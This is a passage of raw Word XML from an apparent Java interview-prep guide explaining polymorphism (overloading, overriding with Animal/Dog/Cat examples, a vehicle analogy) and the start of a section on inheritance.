        </w:rPr>
        <w:t xml:space="preserve"> (2 parameters: size, ice).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634D963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it's all called "order drink", the method for ordering is overloaded based on the parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDBBCA1" w14:textId="39283553"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51531E7">
          <v:rect id="_x0000_i1363" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="228106B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4" w:name="_Toc197867338"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Polymorphism? Explain with an example?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w14:paraId="7B7682A1" w14:textId="36FDB7E8" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3"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an object to take </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>many forms</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It means that you can use the </w:t>
      </w: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to represent different behaviors, depending on the object that invokes the method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7E5347"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654D76C6"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 (Stat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perator Overloading</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (though Java doesn’t support operator overloading).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D27BAB"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 (Dynam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0DF44FD"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5B8F13">
          <v:rect id="_x0000_i1364" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="606646A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Polymorphism Useful?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB20721"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use the same method name for different implementations, making your code more readable and easier to maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC8643E"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 and Extensibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows you to write more flexible code, as the same method name can be used for different objects (different types).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BA5D8B"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C958E">
          <v:rect id="_x0000_i1365" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A347C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Polymorphism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4304A2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explore both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Polymorphism through a real-world example.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C914E7"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257A2">
          <v:rect id="_x0000_i1366" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7433AF6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 — Method Overloading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDC88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106CF250" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E98A4E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integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FA1F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16A8DA2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6C54C4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C23C9" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EC5AC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hree integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0065C33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5AFDF44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5B9070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35F5C4" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="642236D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doubles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9DEF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8EF75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55707D1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7BF1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F88836" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="018E5CA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D86499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3C2F40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918E711" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B6563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6B9F389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564A0A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717B623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57434D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1D14C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B2A787"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are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overloading</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the add method with different parameter types and counts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D1B77D"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mpiler</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> determines which method to call based on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>number and types</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of arguments provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C792142"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2DFDBB9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A1174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0AA7AAE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5D534BC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F8F33E3"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89CAC">
          <v:rect id="_x0000_i1367" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C66B73"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 — Method Overriding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E14E8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 polymorphism allows the method to behave differently based on the actual object being referred to by a reference variable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4324982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DEDD6B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 by subclasses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585461A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832749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02B0B9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C55C6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76361B" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5806891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0DC71F8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B11AA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FBC5CA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583AFD2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6A0ED1D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958EB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918368" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6B271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BC67B7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87A3D5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913C8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2CAF64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3F5704B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E0A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65C28" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FCA3D2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C99CE9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397A8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references of the parent class (Animal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C39B5F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1D0795D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470BEDEF" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FB3D6B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actual method called is determined at runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2140419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3920BF9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86271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622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7B53A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143EB15"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the makeSound method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subclasses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459E42D2"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call is resolved at runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, so when myDog.makeSound() is called, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dog’s version</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of makeSound is executed, and when myCat.makeSound() is called, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cat’s version</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637642FC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF4AF70"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7FB392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6BCB478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 meows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7083199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B9F3C83">
          <v:rect id="_x0000_i1368" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="707AC90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917"/>
        <w:gridCol w:w="4027"/>
      </w:tblGrid>
      <w:tr w:rsidR="003428CE" w:rsidRPr="00CE4B95" w14:paraId="14B43841" w14:textId="77777777" w:rsidTr="000D78D3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="317F9492"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 of Polymorphism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06737C56"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s Achieved</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="177593CF"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3428CE" w:rsidRPr="00CE4B95" w14:paraId="0254B6F9" w14:textId="77777777" w:rsidTr="000D78D3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60DED71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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FEED0D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67CEC4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int a, int b) and add(double a, double b)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003428CE" w:rsidRPr="00CE4B95" w14:paraId="1EAA323D" w14:textId="77777777" w:rsidTr="000D78D3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06FC0D7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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E9DE2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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A12CF5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ound() in Dog and Cat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02560B4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1701E">
          <v:rect id="_x0000_i1369" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FC6B3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Polymorphism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A988C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a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>driver</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the object). You can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uck</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. But, the action of "driving" will be different based on the type of vehicle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F01CF2"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Car</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You use a steering wheel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9338AB"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Bike</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You use handlebars.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F1E045"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Truck</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You use a large steering wheel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F35A3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name remains the same —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but the actual behavior changes based on the type of vehicle you drive. This is polymorphism in action!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C80624" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95"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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5062862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5" w:name="_Toc197867339"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Inheritance?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
    </w:p>
    <w:p w14:paraId="41FB616C" w14:textId="5F6440B3" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614"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one class (child or subclass) to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inherit properties and behaviors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (fields and methods) from another class (parent or superclass). This mechanism provides the ability to </w:t>
      </w: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code, promote modularity, and create a hierarchical class structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D5506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ncepts of Inheritance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097AC6BB"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 (Superclass)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The class whose properties and behaviors are inherited by another class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4626ADB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 (Subclass)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The class that inherits from the parent class. It can add its own properties and methods or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nherited methods to customize behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E2ADF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s Keyword</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The keyword used in Java to establish inheritance. The child class "extends" the parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1738422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39F612">
          <v:rect id="_x0000_i1371" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="644DD9A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heritance in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A4E56B"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A class inherits from only one parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6602015A"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level Inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A class inherits from another class, and that class inherits from another class (creating a chain).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FABE79"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Inheritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Multiple classes inherit from a single parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6A0D90"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 (Through Interface)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Java doesn’t support multiple inheritance directly through classes, but it can be achieved using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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12970C7B"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A1BA94">
          <v:rect id="_x0000_i1372" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C682E1"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nheritance Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2597D46C"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automatically inherits all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members (fields and methods) o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except f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ivate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> members.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBCEF2D"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can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0730772E"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methods and properties of the parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6958CD6A"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new fields and methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> specific to itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECD5412"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methods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the parent class to provide specialized behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761EF3FA"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7F6F6B">
          <v:rect id="_x0000_i1373" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C82BBED"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heritance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7041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ent class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138F78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020F45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properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFA9D7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F77CE8E" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="023BCC6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method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1DEC8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5606DD3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eating.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60617B5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C5BC2F" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
